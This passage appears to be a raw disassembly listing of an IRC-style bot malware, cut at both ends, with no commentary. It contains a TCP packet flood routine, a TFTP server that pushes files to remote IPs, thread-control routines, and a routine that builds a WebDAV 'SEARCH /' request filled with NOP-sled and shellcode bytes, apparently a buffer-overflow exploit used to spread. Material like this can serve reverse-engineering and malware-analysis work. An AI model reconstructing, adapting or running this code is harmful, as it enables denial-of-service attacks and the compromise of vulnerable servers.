lea esi, [ebp+74h+var_30]
lea edi, [ebp+74h+var_A0]
rep movsd
mov [ebp+74h+var_8], ax
pop ecx
lea esi, [ebp+74h+var_18]
lea edi, [ebp+74h+var_8C]
rep movsd
xor eax, eax
lea edi, [ebp+74h+var_78]
stosd
lea eax, [ebp+74h+var_A0]
push 28h
push eax
call sub_407D6B
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+74h+var_26], ax
lea eax, [ebp+74h+var_44]
push eax
push ebx
push 3Ch
lea eax, [ebp+74h+var_A0]
push eax
push [ebp+74h+var_4]
lea esi, [ebp+74h+var_30]
lea edi, [ebp+74h+var_A0]
rep movsd
call dword_4357D8 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_411D9A
inc [ebp+74h+arg_0]
call ds:dword_420004 ; GetTickCount
sub eax, [ebp+74h+var_1C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+74h+var_B4]
jbe loc_411B30
loc_411D15: ; CODE XREF: sub_4119EF+11D�j
push [ebp+74h+var_4]
call dword_435914 ; closesocket
mov eax, [ebp+74h+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+74h+var_B4]
shr ecx, 14h
push ecx
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_23C]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
lea eax, [ebp+74h+var_440]
push offset aTcpDoneWithSFl ; "[TCP]: Done with %s flood to IP: %s. Se"...
push eax
call sub_414415
add esp, 1Ch
cmp [ebp+74h+var_A8], ebx
jnz short loc_411D7D
loc_411D5D: ; CODE XREF: sub_4119EF+84�j
push ebx
push [ebp+74h+var_AC]
lea eax, [ebp+74h+var_440]
push eax
lea eax, [ebp+74h+var_13C]
push eax
push [ebp+74h+var_240]
call sub_4056BF
add esp, 14h
loc_411D7D: ; CODE XREF: sub_4119EF+7E�j
; sub_4119EF+36C�j
lea eax, [ebp+74h+var_440]
push eax
call sub_401EFF
push [ebp+74h+var_BC]
call sub_41255E
pop ecx
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
loc_411D9A: ; CODE XREF: sub_4119EF+302�j
push [ebp+74h+var_4]
call dword_435914 ; closesocket
call dword_4358C0 ; WSAGetLastError
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_23C]
push eax
push offset aTcpErrorSendin ; "[TCP]: Error sending packets to IP: %s."...
lea eax, [ebp+74h+var_440]
push 200h
push eax
call sub_41466D
add esp, 18h
jmp loc_411A6A
sub_4119EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411DD2 proc near ; CODE XREF: sub_411DD2:loc_41228B�p
; DATA XREF: sub_401141+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 884h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, offset aOctet ; "octet"
lea edi, [ebp+74h+var_1C]
movsd
movsw
xor ebx, ebx
push ebx
xor eax, eax
inc eax
mov esi, edx
push 2
mov ecx, 0A9h
lea edi, [ebp+74h+var_37C]
rep movsd
inc [ebp+74h+var_16C]
push 2
mov [ebp+74h+var_10], eax
mov [edx+2A0h], eax
call dword_435808 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+74h+var_4], esi
jnz short loc_411E8E
push 190h
call ds:dword_420000 ; Sleep
call dword_4358C0 ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpErrorSocke ; "[TFTP]: Error: socket() failed, returne"...
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+74h+var_E0], ebx
jnz short loc_411E71
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4056BF
add esp, 14h
loc_411E71: ; CODE XREF: sub_411DD2+7D�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401EFF
push [ebp+74h+var_170]
call sub_41255E
pop ecx
jmp loc_412277
; ---------------------------------------------------------------------------
loc_411E8E: ; CODE XREF: sub_411DD2+52�j
mov eax, [ebp+74h+var_170]
push [ebp+74h+var_168]
imul eax, 234h
mov dword_4366AC[eax], esi
xor eax, eax
lea edi, [ebp+74h+var_44]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_44], 2
call dword_435954 ; htons
mov [ebp+74h+var_42], ax
push 10h
lea eax, [ebp+74h+var_44]
push eax
push esi
mov [ebp+74h+var_40], ebx
call dword_4358E0 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_411EED
push 1388h
call ds:dword_420000 ; Sleep
dec [ebp+74h+var_16C]
push [ebp+74h+arg_0]
jmp loc_41228B
; ---------------------------------------------------------------------------
loc_411EED: ; CODE XREF: sub_411DD2+100�j
lea eax, [ebp+74h+var_378]
push offset dword_420978
push eax
call sub_414BF3
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+74h+var_8], eax
jnz short loc_411F66
push 190h
call ds:dword_420000 ; Sleep
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpFailedToOp ; "[TFTP]: Failed to open file: %s."
push eax
call sub_414415
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4056BF
lea eax, [ebp+74h+var_780]
push eax
call sub_401EFF
push [ebp+74h+var_170]
call sub_41255E
add esp, 28h
jmp loc_412278
; ---------------------------------------------------------------------------
loc_411F66: ; CODE XREF: sub_411DD2+133�j
mov esi, 200h
loc_411F6B: ; CODE XREF: sub_411DD2+471�j
mov edi, [ebp+74h+arg_0]
cmp [edi+2A0h], ebx
jz loc_41224C
mov eax, [ebp+74h+var_4]
push 20h
pop ecx
mov [ebp+74h+var_880], eax
xor eax, eax
lea edi, [ebp+74h+var_D8]
rep stosd
lea eax, [ebp+74h+var_34]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_884]
push eax
push ebx
mov [ebp+74h+var_34], 5
mov [ebp+74h+var_30], 1388h
mov [ebp+74h+var_884], 1
call dword_4358AC ; select
test eax, eax
jle loc_412240
xor eax, eax
mov edx, 80h
mov [ebp+74h+var_580], bl
mov ecx, edx
lea edi, [ebp+74h+var_57F]
rep stosd
stosw
stosb
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push edx
lea eax, [ebp+74h+var_D8]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_C], 10h
call dword_4357A0 ; recvfrom
push [ebp+74h+var_28]
mov [ebp+74h+var_10], eax
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_58]
push eax
call sub_414415
cmp [ebp+74h+var_D8], bl
pop ecx
pop ecx
jnz loc_412228
cmp [ebp+74h+var_D7], 1
jnz loc_412183
lea eax, [ebp+74h+var_274]
lea edx, [eax+1]
loc_41202D: ; CODE XREF: sub_411DD2+260�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41202D
sub eax, edx
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+var_274]
lea edi, [eax+1]
loc_412042: ; CODE XREF: sub_411DD2+275�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_412042
sub eax, edi
push eax
lea eax, [ebp+74h+var_D6]
push eax
lea eax, [ebp+74h+var_274]
push eax
call sub_415D10
add esp, 0Ch
test eax, eax
jnz loc_412141
lea eax, [ebp+74h+var_1C]
lea edx, [eax+1]
loc_41206D: ; CODE XREF: sub_411DD2+2A0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41206D
sub eax, edx
push eax
mov eax, [ebp+74h+var_14]
lea eax, [ebp+eax+74h+var_D5]
push eax
lea eax, [ebp+74h+var_1C]
push eax
call sub_415D10
add esp, 0Ch
test eax, eax
jnz loc_412141
push ebx
push ebx
push [ebp+74h+var_8]
call sub_416087
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
mov [ebp+74h+var_57E], bl
mov [ebp+74h+var_57D], 1
call sub_41499E
add esp, 1Ch
push [ebp+74h+var_C]
lea ecx, [ebp+74h+var_2C]
push ecx
mov [ebp+74h+var_10], eax
push ebx
add eax, 4
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
call dword_4357D8 ; sendto
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTransf ; "[TFTP]: File transfer started to IP: %s"...
loc_4120FB: ; CODE XREF: sub_411DD2+451�j
lea eax, [ebp+74h+var_780]
push eax
call sub_414415
add esp, 10h
cmp [ebp+74h+var_E0], ebx
jnz short loc_41212F
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_4056BF
add esp, 14h
loc_41212F: ; CODE XREF: sub_411DD2+33B�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401EFF
pop ecx
jmp loc_412240
; ---------------------------------------------------------------------------
loc_412141: ; CODE XREF: sub_411DD2+28F�j
; sub_411DD2+2BB�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 13h
push offset dword_4288CC
push [ebp+74h+var_4]
call dword_4357D8 ; sendto
lea eax, [ebp+74h+var_274]
push eax
lea eax, [ebp+74h+var_58]
push eax
lea eax, [ebp+74h+var_D8]
push offset aTftpFileNotFou ; "[TFTP]: File not found: %s (%s)."
push eax
call sub_414415
lea eax, [ebp+74h+var_D8]
push eax
call sub_401EFF
add esp, 14h
jmp loc_412240
; ---------------------------------------------------------------------------
loc_412183: ; CODE XREF: sub_411DD2+24C�j
cmp [ebp+74h+var_D7], 4
jnz loc_412228
mov cl, [ebp+74h+var_D5]
cmp cl, 0FFh
mov al, [ebp+74h+var_D6]
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
jnz short loc_4121B1
inc al
xor cl, cl
mov [ebp+74h+var_57D], bl
jmp short loc_4121B9
; ---------------------------------------------------------------------------
loc_4121B1: ; CODE XREF: sub_411DD2+3D1�j
inc cl
mov [ebp+74h+var_57D], cl
loc_4121B9: ; CODE XREF: sub_411DD2+3DD�j
mov [ebp+74h+var_57E], al
movzx eax, al
shl eax, 8
movzx ecx, cl
add eax, ecx
shl eax, 9
push ebx
sub eax, esi
push eax
push [ebp+74h+var_8]
call sub_416087
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
call sub_41499E
add esp, 1Ch
push [ebp+74h+var_C]
mov edi, eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
lea eax, [edi+4]
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_10], edi
call dword_4357D8 ; sendto
cmp edi, ebx
jnz short loc_412240
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTran_0 ; "[TFTP]: File transfer complete to IP: %"...
jmp loc_4120FB
; ---------------------------------------------------------------------------
loc_412228: ; CODE XREF: sub_411DD2+242�j
; sub_411DD2+3B5�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 9
push offset dword_42886C
push [ebp+74h+var_4]
call dword_4357D8 ; sendto
loc_412240: ; CODE XREF: sub_411DD2+1E9�j
; sub_411DD2+36A�j ...
cmp [ebp+74h+var_10], ebx
jg loc_411F6B
mov edi, [ebp+74h+arg_0]
loc_41224C: ; CODE XREF: sub_411DD2+1A2�j
push [ebp+74h+var_4]
call dword_435914 ; closesocket
push [ebp+74h+var_8]
call sub_4147F3
dec [ebp+74h+var_16C]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_41227F
push [ebp+74h+var_170]
call sub_41255E
loc_412277: ; CODE XREF: sub_411DD2+B7�j
pop ecx
loc_412278: ; CODE XREF: sub_411DD2+18F�j
push ebx
call ds:dword_420014 ; ExitThread
loc_41227F: ; CODE XREF: sub_411DD2+498�j
push 3E8h
call ds:dword_420000 ; Sleep
push edi
loc_41228B: ; CODE XREF: sub_411DD2+116�j
call sub_411DD2
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_411DD2 endp
; =============== S U B R O U T I N E =======================================
sub_41229A proc near ; CODE XREF: sub_401141+F0�p
; sub_401141+23D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_4364A0
loc_4122A2: ; CODE XREF: sub_41229A+18�j
cmp byte ptr [eax], 0
jz short loc_4122B6
add eax, 234h
inc edi
cmp eax, offset dword_47B230
jl short loc_4122A2
jmp short loc_412301
; ---------------------------------------------------------------------------
loc_4122B6: ; CODE XREF: sub_41229A+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_4364A0[esi]
push eax
call sub_4144A0
mov eax, [esp+14h+arg_4]
and dword_4366A4[esi], 0
and dword_4366A8[esi], 0
mov dword_4366A0[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and byte_4366B8[esi], 0
mov dword_4366AC[esi], eax
pop esi
loc_412301: ; CODE XREF: sub_41229A+1A�j
mov eax, edi
pop edi
retn
sub_41229A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412305 proc near ; CODE XREF: sub_41259B+31�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
xor edi, edi
mov esi, offset dword_4364A0
loc_41232F: ; CODE XREF: sub_412305+78�j
cmp byte ptr [esi], 0
jz short loc_412370
cmp [ebp+arg_C], 0
jnz short loc_412343
cmp dword ptr [esi+204h], 0
jnz short loc_412370
loc_412343: ; CODE XREF: sub_412305+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_414415
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 24h
loc_412370: ; CODE XREF: sub_412305+2D�j
; sub_412305+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_47B230
jl short loc_41232F
pop edi
pop esi
leave
retn
sub_412305 endp
; =============== S U B R O U T I N E =======================================
sub_412383 proc near ; CODE XREF: sub_4089DC+3C73�p
; sub_41240B+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_412405
cmp esi, 1F4h
jge short loc_412405
imul esi, 234h
push edi
push ebx
lea edi, dword_4366B4[esi]
push dword ptr [edi]
call ds:dword_4200F0 ; TerminateThread
cmp [edi], ebx
jz short loc_4123B5
inc ebp
loc_4123B5: ; CODE XREF: sub_412383+2F�j
mov [edi], ebx
lea edi, dword_4366A8[esi]
mov eax, [edi]
cmp eax, ebx
mov dword_4366A0[esi], ebx
mov dword_4366A4[esi], ebx
jbe short loc_4123D6
push eax
call sub_4085A8
pop ecx
loc_4123D6: ; CODE XREF: sub_412383+4A�j
mov [edi], ebx
lea edi, dword_4366AC[esi]
push dword ptr [edi]
mov byte ptr dword_4364A0[esi], bl
mov byte_4366B8[esi], bl
call dword_435914 ; closesocket
lea esi, dword_4366B0[esi]
push dword ptr [esi]
mov [edi], ebx
call dword_435914 ; closesocket
mov [esi], ebx
pop edi
loc_412405: ; CODE XREF: sub_412383+D�j
; sub_412383+15�j
pop esi
mov eax, ebp
pop ebp
pop ebx
retn
sub_412383 endp
; =============== S U B R O U T I N E =======================================
sub_41240B proc near ; CODE XREF: sub_402E5D+18�p
; sub_4089DC+3C2C�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_4364A0
loc_412417: ; CODE XREF: sub_41240B+2A�j
cmp byte ptr [esi], 0
jz short loc_412428
push edi
call sub_412383
test eax, eax
pop ecx
jz short loc_412428
inc ebx
loc_412428: ; CODE XREF: sub_41240B+F�j
; sub_41240B+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_47B230
jl short loc_412417
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_41240B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41243D proc near ; CODE XREF: sub_4124D0+1D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_4366A4
loc_412451: ; CODE XREF: sub_41243D+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_412473
test edi, edi
jle short loc_412465
cmp [esi], edi
jz short loc_412465
cmp ebx, edi
jnz short loc_412473
loc_412465: ; CODE XREF: sub_41243D+1E�j
; sub_41243D+22�j
push ebx
call sub_412383
test eax, eax
pop ecx
jz short loc_412473
inc [ebp+var_4]
loc_412473: ; CODE XREF: sub_41243D+1A�j
; sub_41243D+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_47B434
jl short loc_412451
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41243D endp
; =============== S U B R O U T I N E =======================================
sub_41248A proc near ; CODE XREF: sub_4010CA+B�p
; sub_401141+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_4366A0
loc_412491: ; CODE XREF: sub_41248A+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_41249A
inc eax
loc_41249A: ; CODE XREF: sub_41248A+D�j
add ecx, 234h
cmp ecx, offset dword_47B430
jl short loc_412491
retn
sub_41248A endp
; =============== S U B R O U T I N E =======================================
sub_4124A9 proc near ; CODE XREF: sub_4089DC+4572�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_4366A0
push esi
loc_4124B3: ; CODE XREF: sub_4124A9+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_4124CC
add ecx, 234h
inc edx
cmp ecx, offset dword_47B430
jl short loc_4124B3
pop esi
retn
; ---------------------------------------------------------------------------
loc_4124CC: ; CODE XREF: sub_4124A9+10�j
mov eax, edx
pop esi
retn
sub_4124A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124D0 proc near ; CODE XREF: sub_4089DC:loc_40A899�p
; sub_4089DC+4CB1�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_4124E9
push [ebp+arg_1C]
call sub_4147A2
pop ecx
loc_4124E9: ; CODE XREF: sub_4124D0+E�j
push eax
push [ebp+arg_18]
call sub_41243D
test eax, eax
pop ecx
pop ecx
jle short loc_412515
push eax
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_414415
add esp, 14h
jmp short loc_41252F
; ---------------------------------------------------------------------------
loc_412515: ; CODE XREF: sub_4124D0+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_414415
add esp, 10h
loc_41252F: ; CODE XREF: sub_4124D0+43�j
cmp [ebp+arg_C], 0
jnz short loc_41254F
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_41254F: ; CODE XREF: sub_4124D0+63�j
lea eax, [ebp+var_200]
push eax
call sub_401EFF
pop ecx
leave
retn
sub_4124D0 endp
; =============== S U B R O U T I N E =======================================
sub_41255E proc near ; CODE XREF: sub_401967+227�p
; sub_401B9D+244�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
imul eax, 234h
xor ecx, ecx
mov dword_4366B4[eax], ecx
mov dword_4366A0[eax], ecx
mov dword_4366A4[eax], ecx
mov dword_4366A8[eax], ecx
mov dword_4366AC[eax], ecx
mov dword_4366B0[eax], ecx
mov byte ptr dword_4364A0[eax], cl
mov byte_4366B8[eax], cl
retn
sub_41255E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41259B proc near ; DATA XREF: sub_4089DC+4B05�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
push [ebp+74h+var_10]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_412305
push [ebp+74h+var_14]
call sub_41255E
add esp, 14h
push 0
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_41259B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125E5 proc near ; CODE XREF: sub_401967+1F8�p
; DATA XREF: .data:off_42B06C�o
var_1210 = byte ptr -1210h
var_11AC = byte ptr -11ACh
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_98 = byte ptr 0A0h
arg_124 = dword ptr 12Ch
arg_12C = dword ptr 134h
arg_134 = dword ptr 13Ch
arg_138 = dword ptr 140h
push ebp
mov ebp, esp
mov eax, 1210h
call sub_414630
push 6
push 1
push 2
call dword_435808 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41260A
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41260A: ; CODE XREF: sub_4125E5+1F�j
push ebx
push esi
push edi
push [ebp+arg_124]
call dword_435954 ; htons
lea eax, [ebp+arg_4]
push eax
call dword_43587C ; inet_addr
push 186A0h
call sub_414CAD
mov edi, 1000h
push edi
mov ebx, eax
call sub_414CAD
pop ecx
pop ecx
push offset byte_42BF4C
push [ebp+arg_0]
mov esi, eax
mov [ebp+var_C], esi
call sub_407D15
pop ecx
push eax
push edi
push esi
call sub_410C5C
add esp, 10h
test eax, eax
mov [ebp+var_8], eax
jnz short loc_41267F
push ebx
call sub_414844
push esi
call sub_414844
pop ecx
pop ecx
push [ebp+var_10]
loc_412672: ; CODE XREF: sub_4125E5+27B�j
call dword_435914 ; closesocket
xor eax, eax
jmp loc_4128FF
; ---------------------------------------------------------------------------
loc_41267F: ; CODE XREF: sub_4125E5+7A�j
push 19h
mov eax, 90909090h
pop ecx
lea edi, [ebp+var_1210]
rep stosd
mov ecx, [ebp+var_8]
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_11AC]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov ecx, 61A8h
mov edi, ebx
rep stosd
mov esi, offset aSearch ; "SEARCH /"
mov edi, ebx
movsd
movsd
mov eax, ebx
movsb
lea esi, [eax+1]
loc_4126C0: ; CODE XREF: sub_4125E5+E0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4126C0
sub eax, esi
mov esi, eax
lea edx, [esi+1]
lea eax, [esi+866h]
cmp edx, eax
mov byte ptr [esi+ebx], 90h
jnb short loc_4126FE
sub eax, edx
dec eax
shr eax, 1
inc eax
mov ecx, eax
mov [ebp+var_4], ecx
shr ecx, 1
lea edi, [edx+ebx]
mov eax, 0B102B102h
rep stosd
adc ecx, ecx
rep stosw
mov eax, [ebp+var_4]
lea edx, [edx+eax*2]
loc_4126FE: ; CODE XREF: sub_4125E5+F5�j
mov eax, offset loc_42C490
mov edi, eax
lea ecx, [edi+1]
mov [ebp+var_4], ecx
loc_41270B: ; CODE XREF: sub_4125E5+12B�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_41270B
sub edi, [ebp+var_4]
jmp short loc_41272C
; ---------------------------------------------------------------------------
loc_412717: ; CODE XREF: sub_4125E5+155�j
lea ecx, [edi+1]
mov byte ptr [edx+ebx], 90h
inc edx
mov [ebp+var_4], ecx
loc_412722: ; CODE XREF: sub_4125E5+142�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_412722
sub edi, [ebp+var_4]
loc_41272C: ; CODE XREF: sub_4125E5+130�j
mov ecx, esi
sub ecx, edi
add ecx, 0FFFFh
cmp edx, ecx
mov edi, eax
jb short loc_412717
lea esi, [edi+1]
loc_41273F: ; CODE XREF: sub_4125E5+15F�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_41273F
sub edi, esi
mov ecx, edi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [edx+ebx]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebx
dec edi
loc_412760: ; CODE XREF: sub_4125E5+181�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_412760
mov esi, offset aHttp1_1 ; " HTTP/1.1\r\n"
movsd
movsd
movsd
mov esi, offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<g:searchrequest"...
mov eax, esi
lea edi, [eax+1]
loc_41277A: ; CODE XREF: sub_4125E5+19A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41277A
sub eax, edi
mov edi, eax
mov eax, ebx
lea ecx, [eax+1]
loc_41278A: ; CODE XREF: sub_4125E5+1AA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41278A
sub eax, ecx
mov ecx, [ebp+var_8]
add edi, ecx
push edi
lea ecx, [ebp+arg_4]
push ecx
add eax, ebx
push offset aHostSContentTy ; "Host: %s\r\nContent-Type: text/xml\r\nConte"...
push eax
call sub_414415
add esp, 10h
mov eax, esi
loc_4127AF: ; CODE XREF: sub_4125E5+1CF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4127AF
mov edi, ebx
sub eax, esi
dec edi
loc_4127BB: ; CODE XREF: sub_4125E5+1DC�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4127BB
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_4127D6: ; CODE XREF: sub_4125E5+1F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4127D6
sub eax, esi
mov ecx, eax
mov eax, 1010101h
lea edi, [ecx+ebx]
stosb
mov eax, ebx
lea esi, [eax+1]
loc_4127EF: ; CODE XREF: sub_4125E5+20F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4127EF
sub eax, esi
mov ecx, eax
mov eax, 90909090h
lea edi, [ecx+ebx]
stosw
stosb
mov eax, ebx
lea esi, [eax+1]
loc_41280A: ; CODE XREF: sub_4125E5+22A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41280A
mov ecx, [ebp+var_8]
sub eax, esi
lea edi, [eax+ebx]
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_1210]
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_412832: ; CODE XREF: sub_4125E5+252�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412832
sub eax, esi
mov esi, [ebp+var_10]
xor edi, edi
push edi
push eax
push ebx
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_412865
push ebx
call sub_414844
push [ebp+var_C]
call sub_414844
pop ecx
pop ecx
push esi
jmp loc_412672
; ---------------------------------------------------------------------------
loc_412865: ; CODE XREF: sub_4125E5+268�j
push edi
push 1388h
push ebx
push esi
call dword_43577C ; recv
push ebx
call sub_414844
push [ebp+var_C]
call sub_414844
pop ecx
pop ecx
push esi
call dword_435914 ; closesocket
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_12C]
